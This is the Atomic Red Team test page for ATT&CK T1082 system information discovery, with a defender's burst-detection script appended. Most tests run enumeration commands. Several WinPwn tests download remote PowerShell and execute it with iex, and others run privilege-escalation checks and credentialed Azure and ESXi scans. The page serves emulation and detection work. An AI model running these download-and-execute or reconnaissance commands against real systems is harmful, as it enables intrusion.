
T1082

System Information Discovery

Description from ATT&CK

An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use this information to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. This behavior is distinct from Local Storage Discovery which is an adversary's discovery of local drive, disks and/or volumes.

Tools such as Systeminfo can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. Adversaries may leverage a Network Device CLI on network devices to gather detailed system information (e.g. show version).(Citation: US-CERT-TA18-106A) On ESXi servers, threat actors may gather system information from various esxcli utilities, such as system hostname get and system version get.(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)(Citation: Varonis)

Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)

System Information Discovery combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)

Atomic Tests

Atomic Test #1 - System Information Discovery

Identify System Info. Upon execution, system info and time info will be displayed.

Supported Platforms: Windows

auto_generated_guid: 66703791-c902-4560-8770-42b8a91f7667

Attack Commands: Run with command_prompt!

systeminfo
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum

Atomic Test #2 - System Information Discovery

Identify System Info

Supported Platforms: macOS

auto_generated_guid: edff98ec-0f73-4f63-9890-6b117092aff6

Attack Commands: Run with sh!

system_profiler
ls -al /Applications

Atomic Test #3 - List OS Information

Identify System Info

Supported Platforms: Linux, macOS

auto_generated_guid: cccb070c-df86-4216-a5bc-9fb60c74e27c

Inputs:

Name | Description | Type | Default Value
output_file | Output file used to store the results. | path | /tmp/T1082.txt

Attack Commands: Run with sh!

uname -a >> #{output_file}
if [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> #{output_file}; fi
if [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> #{output_file}; fi
if [ -f /etc/issue ]; then cat /etc/issue >> #{output_file}; fi
if [ -f /etc/os-release ]; then cat /etc/os-release >> #{output_file}; fi
uptime >> #{output_file}
cat #{output_file} 2>/dev/null

Cleanup Commands:

rm #{output_file} 2>/dev/null

Atomic Test #4 - Linux VM Check via Hardware

Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware.

Supported Platforms: Linux

auto_generated_guid: 31dad7ad-2286-4c02-ae92-274418c85fec

Attack Commands: Run with bash! Elevation Required (e.g. root or admin)

if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi
if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"; fi
if [ -f /sys/class/dmi/id/chassis_vendor ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"; fi
if [ -x "$(command -v dmidecode)" ]; then sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|qemu\|domu"; fi
if [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i "vmware\|vbox"; fi
if [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual"; fi
if [ -x "$(command -v lspci)" ]; then sudo lspci | grep -i "vmware\|virtualbox"; fi
if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft"; fi

Atomic Test #5 - Linux VM Check via Kernel Modules

Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware.

Supported Platforms: Linux

auto_generated_guid: 8057d484-0fae-49a4-8302-4812c4f1e64e

Attack Commands: Run with bash! Elevation Required (e.g. root or admin)

sudo lsmod | grep -i "vboxsf\|vboxguest"
sudo lsmod | grep -i "vmw_balloon\|vmxnet"
sudo lsmod | grep -i "xen-vbd\|xen-vnif"
sudo lsmod | grep -i "virtio_pci\|virtio_net"
sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"

Atomic Test #6 - FreeBSD VM Check via Kernel Modules

Identify virtual machine host kernel modules.

Supported Platforms: Linux

auto_generated_guid: eefe6a49-d88b-41d8-8fc2-b46822da90d3

Attack Commands: Run with sh!

kldstat | grep -i "vmm"
kldstat | grep -i "vbox"

Atomic Test #7 - Hostname Discovery (Windows)

Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed.

Supported Platforms: Windows

auto_generated_guid: 85cfbf23-4a1e-4342-8792-007e004b975f

Attack Commands: Run with command_prompt!

hostname

Atomic Test #8 - Hostname Discovery

Identify system hostname for FreeBSD, Linux and macOS systems.

Supported Platforms: Linux, macOS

auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133

Attack Commands: Run with sh!

hostname

Atomic Test #9 - Windows MachineGUID Discovery

Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry.

Supported Platforms: Windows

auto_generated_guid: 224b4daf-db44-404e-b6b2-f4d1f0126ef8

Attack Commands: Run with command_prompt!

REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid

Atomic Test #10 - Griffon Recon

This script emulates the reconnaissance script used by Griffon. It was modified by security researcher Kirk Sayre so that it simply prints the recon results to the screen instead of exfiltrating them. For more information see also https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon and https://attack.mitre.org/software/S0417/

Supported Platforms: Windows

auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370

Inputs:

Name | Description | Type | Default Value
vbscript | Path to sample script | string | PathToAtomicsFolder\T1082\src\griffon_recon.vbs

Attack Commands: Run with powershell!

cscript "#{vbscript}"

Dependencies: Run with powershell!

Description: Sample script file must exist on disk at specified location (#{vbscript})
Check Prereq Commands:
if (Test-Path "#{vbscript}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{vbscript}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1082/src/griffon_recon.vbs" -OutFile "#{vbscript}"

Atomic Test #11 - Environment variables discovery on windows

Identify all environment variables. Upon execution, environment variables and your path info will be displayed.

Supported Platforms: Windows

auto_generated_guid: f400d1c0-1804-4ff8-b069-ef5ddd2adbf3

Attack Commands: Run with command_prompt!

set

Atomic Test #12 - Environment variables discovery on freebsd, macos and linux

Identify all environment variables. Upon execution, environment variables and your path info will be displayed.

Supported Platforms: Linux, macOS

auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720

Attack Commands: Run with sh!

env

Atomic Test #13 - Show System Integrity Protection status (MacOS)

Read and display System Integrity Protection status. csrutil is commonly used by malware and post-exploitation tools to determine whether certain files and directories on the system are writable or not.

Supported Platforms: macOS

auto_generated_guid: 327cc050-9e99-4c8e-99b5-1d15f2fb6b96

Attack Commands: Run with sh!

csrutil status

Atomic Test #14 - WinPwn - winPEAS

Discover Local Privilege Escalation possibilities using winPEAS function of WinPwn

Supported Platforms: Windows

auto_generated_guid: eea1d918-825e-47dd-acc2-814d6c58c0e1

Attack Commands: Run with powershell!

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
winPEAS -noninteractive -consoleoutput

Atomic Test #15 - WinPwn - itm4nprivesc

Discover Local Privilege Escalation possibilities using itm4nprivesc function of WinPwn

Supported Platforms: Windows

auto_generated_guid: 3d256a2f-5e57-4003-8eb6-64d91b1da7ce

Attack Commands: Run with powershell!

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
itm4nprivesc -noninteractive -consoleoutput

Atomic Test #16 - WinPwn - Powersploits privesc checks

Powersploits privesc checks using oldchecks function of WinPwn

Supported Platforms: Windows

auto_generated_guid: 345cb8e4-d2de-4011-a580-619cf5a9e2d7

Attack Commands: Run with powershell!

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
oldchecks -noninteractive -consoleoutput

Cleanup Commands:

rm -force -recurse .\DomainRecon -ErrorAction Ignore
rm -force -recurse .\Exploitation -ErrorAction Ignore
rm -force -recurse .\LocalPrivEsc -ErrorAction Ignore
rm -force -recurse .\LocalRecon -ErrorAction Ignore
rm -force -recurse .\Vulnerabilities -ErrorAction Ignore

Atomic Test #17 - WinPwn - General privesc checks

General privesc checks using the otherchecks function of WinPwn

Supported Platforms: Windows

auto_generated_guid: 5b6f39a2-6ec7-4783-a5fd-2c54a55409ed

Attack Commands: Run with powershell!

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
otherchecks -noninteractive -consoleoutput

Atomic Test #18 - WinPwn - GeneralRecon

Collect general computer information via the GeneralRecon function of WinPwn

Supported Platforms: Windows

auto_generated_guid: 7804659b-fdbf-4cf6-b06a-c03e758590e8

Attack Commands: Run with powershell!

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Generalrecon -consoleoutput -noninteractive

Atomic Test #19 - WinPwn - Morerecon

Gathers local system information using the Morerecon function of WinPwn

Supported Platforms: Windows

auto_generated_guid: 3278b2f6-f733-4875-9ef4-bfed34244f0a

Attack Commands: Run with powershell!

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Morerecon -noninteractive -consoleoutput

Atomic Test #20 - WinPwn - RBCD-Check

Search for Resource-Based Constrained Delegation attack paths using RBCD-Check function of WinPwn

Supported Platforms: Windows

auto_generated_guid: dec6a0d8-bcaf-4c22-9d48-2aee59fb692b

Attack Commands: Run with powershell!

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
RBCD-Check -consoleoutput -noninteractive

Atomic Test #21 - WinPwn - PowerSharpPack - Watson searching for missing windows patches

PowerSharpPack - runs the Watson check for missing Windows patches via a WinPwn function

Supported Platforms: Windows

auto_generated_guid: 07b18a66-6304-47d2-bad0-ef421eb2e107

Attack Commands: Run with powershell!

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1')
Invoke-watson

Atomic Test #22 - WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors

PowerSharpPack - runs the SharpUp check for common privesc vectors via a WinPwn function. Takes several minutes to complete.

Supported Platforms: Windows

auto_generated_guid: efb79454-1101-4224-a4d0-30c9c8b29ffc

Attack Commands: Run with powershell!

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')
Invoke-SharpUp -command "audit"

Atomic Test #23 - WinPwn - PowerSharpPack - Seatbelt

PowerSharpPack - Seatbelt technique via function of WinPwn.

Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.

Supported Platforms: Windows

auto_generated_guid: 5c16ceb4-ba3a-43d7-b848-a13c1f216d95

Attack Commands: Run with powershell!

$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
Invoke-Seatbelt -Command "-group=all"

Atomic Test #24 - Azure Security Scan with SkyArk

Upon successful execution, this test will utilize a valid read-only Azure AD user's credentials to conduct a security scan and determine what users exist in a given tenant, as well as identify any admin users. Once the test is complete, a folder will be output to the temp directory that contains 3 csv files which provide info on the discovered users. See https://github.com/cyberark/SkyArk

Supported Platforms: Azure-ad

auto_generated_guid: 26a18d3d-f8bc-486b-9a33-d6df5d78a594

Inputs:

Name | Description | Type | Default Value
username | Azure AD username | string |
password | Azure AD password | string | T1082Az

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Import-Module "PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1" -force
$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
Connect-AzAccount -Credential $Credential
Connect-AzureAD -Credential $Credential
Scan-AzureAdmins -UseCurrentCred

Cleanup Commands:

$resultstime = Get-Date -Format "yyyyMMdd"
$resultsfolder = ("Results-" + $resultstime)
remove-item $env:temp\$resultsfolder -recurse -force -erroraction silentlycontinue

Dependencies: Run with powershell!

Description: The SkyArk AzureStealth module must exist in PathToAtomicsFolder\..\ExternalPayloads.
Check Prereq Commands:
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1"){exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
invoke-webrequest "https://raw.githubusercontent.com/cyberark/SkyArk/3293ee145e95061a8980dd7b5da0030edc4da5c0/AzureStealth/AzureStealth.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1"
Description: The AzureAD module must be installed.
Check Prereq Commands:
try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
Get Prereq Commands:
Install-Module -Name AzureAD -Force
Description: The Az module must be installed.
Check Prereq Commands:
try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
Get Prereq Commands:
Install-Module -Name Az -Force

Atomic Test #25 - Linux List Kernel Modules

Enumerate installed kernel modules in three different ways. Upon successful execution, stdout will display the kernel modules installed on the host twice, followed by the list of modules matching 'vmw' if present.

Supported Platforms: Linux

auto_generated_guid: 034fe21c-3186-49dd-8d5d-128b35f181c7

Attack Commands: Run with sh!

lsmod
kmod list
grep vmw /proc/modules

Atomic Test #26 - FreeBSD List Kernel Modules

Enumerate loaded kernel modules. Upon successful execution, stdout will display the loaded kernel modules, followed by the list of modules matching 'vmm' if present.

Supported Platforms: Linux

auto_generated_guid: 4947897f-643a-4b75-b3f5-bed6885749f6

Attack Commands: Run with sh!

kldstat
kldstat | grep vmm

Atomic Test #27 - System Information Discovery with WMIC

Identify system information with the WMI command-line (WMIC) utility. Upon execution, various system information will be displayed, including: OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. See https://nwgat.ninja/getting-system-information-with-wmic-on-windows/ Elements of this test were observed in the wild, used by Aurora Stealer in late 2022 and early 2023, as highlighted in public reporting: https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar and https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/

Supported Platforms: Windows

auto_generated_guid: 8851b73a-3624-4bf7-8704-aa312411565c

Attack Commands: Run with command_prompt!

wmic cpu get name
wmic MEMPHYSICAL get MaxCapacity
wmic baseboard get product
wmic baseboard get version
wmic bios get SMBIOSBIOSVersion
wmic path win32_VideoController get name
wmic path win32_VideoController get DriverVersion
wmic path win32_VideoController get VideoModeDescription
wmic OS get Caption,OSArchitecture,Version
wmic DISKDRIVE get Caption
powershell.exe -c "Get-WmiObject win32_bios"

Atomic Test #28 - System Information Discovery

The script gathernetworkinfo.vbs is employed to collect system information such as the operating system, DNS details, firewall configuration, etc. Outputs are stored in c:\Windows\System32\config or c:\Windows\System32\reg. https://www.verboon.info/2011/06/the-gathernetworkinfo-vbs-script/

Supported Platforms: Windows

auto_generated_guid: 4060ee98-01ae-4c8e-8aad-af8300519cc7

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

wscript.exe C:\Windows\System32\gatherNetworkInfo.vbs

Atomic Test #29 - Check computer location

Looks up the country code configured in the registry, likely for geofencing. Upon execution, country code info will be displayed.

Supported Platforms: Windows

auto_generated_guid: 96be6002-9200-47db-94cb-c3e27de1cb36

Attack Commands: Run with command_prompt!

reg query "HKEY_CURRENT_USER\Control Panel\International\Geo"

Atomic Test #30 - BIOS Information Discovery through Registry

Looks up BIOS information in the registry. BIOS information is often read in order to detect sandboxing environments. Upon execution, BIOS information will be displayed.

Supported Platforms: Windows

auto_generated_guid: f2f91612-d904-49d7-87c2-6c165d23bead

Attack Commands: Run with command_prompt!

reg query HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System /v SystemBiosVersion
reg query HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System /v VideoBiosVersion

Atomic Test #31 - ESXi - VM Discovery using ESXCLI

An adversary may use ESXCLI to enumerate the virtual machines on the host prior to executing a power-off routine.

Supported Platforms: Windows

auto_generated_guid: 2040405c-eea6-4c1c-aef3-c2acc430fac9

Inputs:

Name | Description | Type | Default Value
vm_host | Specify the host name or IP of the ESXi Server | string | atomic.local
vm_user | Specify the privileged user account on the ESXi Server | string | root
vm_pass | Specify the privileged user password on the ESXi Server | string | pass
plink_file | Path to Plink | path | PathToAtomicsFolder\..\ExternalPayloads\plink.exe
cli_script | Path to file with discovery commands | path | PathToAtomicsFolder\T1082\src\esx_vmdiscovery.txt

Attack Commands: Run with command_prompt!

echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"

Dependencies: Run with powershell!

Description: Check if plink is available.
Check Prereq Commands:
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"

Atomic Test #32 - ESXi - Darkside system information discovery

Darkside ransomware utilises various ESXCLI commands to obtain information about the ESXi host.

Supported Platforms: Windows

auto_generated_guid: f89812e5-67d1-4f49-86fa-cbc6609ea86a

Inputs:

Name | Description | Type | Default Value
vm_host | Specify the host name or IP of the ESXi Server | string | atomic.local
vm_user | Specify the privileged user account on the ESXi Server | string | root
vm_pass | Specify the privileged user password on the ESXi Server | string | pass
plink_file | Path to Plink | path | PathToAtomicsFolder\..\ExternalPayloads\plink.exe
cli_script | Path to file containing Darkside ransomware discovery commands | path | PathToAtomicsFolder\T1082\src\esx_darkside_discovery.txt

Attack Commands: Run with command_prompt!

echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"

Dependencies: Run with powershell!

Description: Check if plink is available.
Check Prereq Commands:
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"

Atomic Test #33 - sysctl to gather macOS hardware info

Gets the macOS hardware information, which can be used to determine whether the target macOS host is running on a physical or virtual machine. sysctl can be used to gather interesting macOS host data, including hardware information, memory size, logical cpu information, etc.

Supported Platforms: macOS

auto_generated_guid: c8d40da9-31bd-47da-a497-11ea55d1ef6c

Attack Commands: Run with sh!

sysctl -n hw.model

Atomic Test #34 - operating system discovery

Operating system discovery using Get-CimInstance. See https://petri.com/getting-operating-system-information-powershell/

Supported Platforms: Windows

auto_generated_guid: 70e13ef4-5a74-47e4-9d16-760b41b0e2db

Attack Commands: Run with powershell!

Get-CimInstance Win32_OperatingSystem | Select-Object Caption, Version, ServicePackMajorVersion, OSArchitecture, CSName, WindowsDirectory | Out-null

Atomic Test #35 - Check OS version via "ver" command

The ver command shows information about the OS version.

Supported Platforms: Windows

auto_generated_guid: f6ecb109-df24-4303-8d85-1987dbae6160

Attack Commands: Run with command_prompt!

ver

Atomic Test #36 - Display volume shadow copies with "vssadmin"

The command shows all available volume shadow copies, along with their creation time and location.

Supported Platforms: Windows

auto_generated_guid: 7161b085-816a-491f-bab4-d68e974b7995

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

vssadmin.exe list shadows

Atomic Test #37 - Identify System Locale and Regional Settings with PowerShell

This action demonstrates how an attacker might gather a system's region and language settings using PowerShell, which could aid in profiling the machine's location and user language preferences. The command outputs system locale details to a temporary file for further analysis.

Supported Platforms: Windows

auto_generated_guid: ce479c1a-e8fa-42b2-812a-96b0f2f4d28a

Attack Commands: Run with command_prompt!

powershell.exe -c "Get-Culture | Format-List | Out-File -FilePath %TMP%\a.txt"

Cleanup Commands:

cmd.exe /c del "%TMP%\a.txt"

Atomic Test #38 - Enumerate Available Drives via gdr

This test simulates an attacker attempting to list the available drives on the system to gather data about file storage locations.

Supported Platforms: Windows

auto_generated_guid: c187c9bc-4511-40b3-aa10-487b2c70b6a5

Attack Commands: Run with command_prompt!

powershell.exe -c "gdr -PSProvider 'FileSystem'"

Atomic Test #39 - Discover OS Product Name via Registry

Identify the Operating System Product Name via registry with the reg.exe command. Upon execution, the OS Product Name will be displayed.

Supported Platforms: Windows

auto_generated_guid: be3b5fe3-a575-4fb8-83f6-ad4a68dd5ce7

Attack Commands: Run with command_prompt!

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName

Atomic Test #40 - Discover OS Build Number via Registry

Identify the Operating System Build Number via registry with the reg.exe command. Upon execution, the OS Build Number will be displayed.

Supported Platforms: Windows

auto_generated_guid: acfcd709-0013-4f1e-b9ee-bc1e7bafaaec

Attack Commands: Run with command_prompt!

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v CurrentBuildNumber
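As an added defender-side example (not part of this Atomic Red Team page), the following Python flags a burst of the discovery command families listed in the tests above coming from one parent process, which is the pattern these tests produce when several of them run in sequence. The `ts|host|parent|cmdline` log format, host names and time stamps are constructed for the example.

```python
"""Flag bursts of T1082 discovery commands per (host, parent process).

Added example for the atomic tests above; the record format is constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# One regex per discovery command family shown in the atomic tests above. Bare
# "hostname", "ver", "set" and "env" are deliberately omitted: on their own they
# are far too noisy to be worth a rule.
T1082_RULES = [
    ("systeminfo", r"\bsysteminfo(\.exe)?\b"),
    ("reg_query_machineguid", r"\breg(\.exe)?\s+query\b.*\\Cryptography\b.*\bMachineGuid\b"),
    ("reg_query_osversion", r"\breg(\.exe)?\s+query\b.*Windows NT\\CurrentVersion"),
    ("reg_query_bios", r"\breg(\.exe)?\s+query\b.*HARDWARE\\DESCRIPTION\\System"),
    ("reg_query_geo", r"\breg(\.exe)?\s+query\b.*International\\Geo\b"),
    ("reg_query_disk_enum", r"\breg(\.exe)?\s+query\b.*Services\\Disk\\Enum\b"),
    ("wmic_hardware", r"\bwmic(\.exe)?\s+(cpu|memphysical|baseboard|bios|os|diskdrive|path\s+win32_videocontroller)\b"),
    ("cim_os_or_bios", r"\bGet-(CimInstance|WmiObject)\s+Win32_(OperatingSystem|bios)\b"),
    ("gathernetworkinfo_vbs", r"gatherNetworkInfo\.vbs"),
    ("vssadmin_list_shadows", r"\bvssadmin(\.exe)?\s+list\s+shadows\b"),
    ("get_culture", r"\bGet-Culture\b"),
    ("csrutil_status", r"\bcsrutil\s+status\b"),
    ("sysctl_hw_model", r"\bsysctl\b.*\bhw\.model\b"),
    ("dmi_or_dmidecode", r"/sys/class/dmi/id/|\bdmidecode\b"),
    ("kernel_module_listing", r"\b(lsmod|kldstat|kmod\s+list)\b|/proc/modules"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in T1082_RULES]

# Constructed process-creation records: ts|host|parent_image|command_line
SAMPLE_LOG = r"""
2024-03-04T10:00:00|WS01|cmd.exe|systeminfo
2024-03-04T10:00:05|WS01|cmd.exe|reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
2024-03-04T10:00:12|WS01|cmd.exe|wmic cpu get name
2024-03-04T10:00:20|WS01|cmd.exe|reg query "HKEY_CURRENT_USER\Control Panel\International\Geo"
2024-03-04T10:31:00|WS02|powershell.exe|Get-CimInstance Win32_OperatingSystem | Select-Object Caption, Version
2024-03-04T11:00:00|MAC01|bash|csrutil status
2024-03-04T11:00:03|MAC01|bash|sysctl -n hw.model
"""


def parse_log(text):
    """Parse the constructed 'ts|host|parent|cmdline' records into dicts."""
    events = []
    for line in text.strip().splitlines():
        ts, host, parent, cmdline = line.split("|", 3)  # cmdline may contain '|'
        events.append({"ts": datetime.fromisoformat(ts), "host": host,
                       "parent": parent, "cmdline": cmdline})
    return events


def classify(cmdline):
    """Names of the T1082 rule families a single command line matches."""
    return [name for name, rx in COMPILED if rx.search(cmdline)]


def find_discovery_bursts(events, window=timedelta(minutes=5), threshold=3):
    """Alert once per (host, parent) when at least `threshold` distinct discovery
    families appear within `window`. One such command is everyday admin noise;
    several different ones in quick succession from one parent are not."""
    alerts, recent, alerted = [], defaultdict(deque), set()
    for ev in sorted(events, key=lambda e: e["ts"]):
        rules = classify(ev["cmdline"])
        if not rules:
            continue
        key = (ev["host"], ev["parent"])
        q = recent[key]
        q.append((ev["ts"], rules, ev["cmdline"]))
        while ev["ts"] - q[0][0] > window:  # drop events outside the window
            q.popleft()
        distinct = sorted({r for _, rs, _ in q for r in rs})
        if len(distinct) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"host": ev["host"], "parent": ev["parent"],
                           "first_seen": q[0][0], "last_seen": ev["ts"],
                           "rules": distinct, "commands": [c for _, _, c in q]})
    return alerts


if __name__ == "__main__":
    for a in find_discovery_bursts(parse_log(SAMPLE_LOG)):
        print(f"[T1082] {a['host']} parent={a['parent']} rules={a['rules']}")
```

Only the WS01 cmd.exe session trips the threshold; the single Get-CimInstance call on WS02 and the two macOS commands stay below it, which is the trade-off the window and threshold encode.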
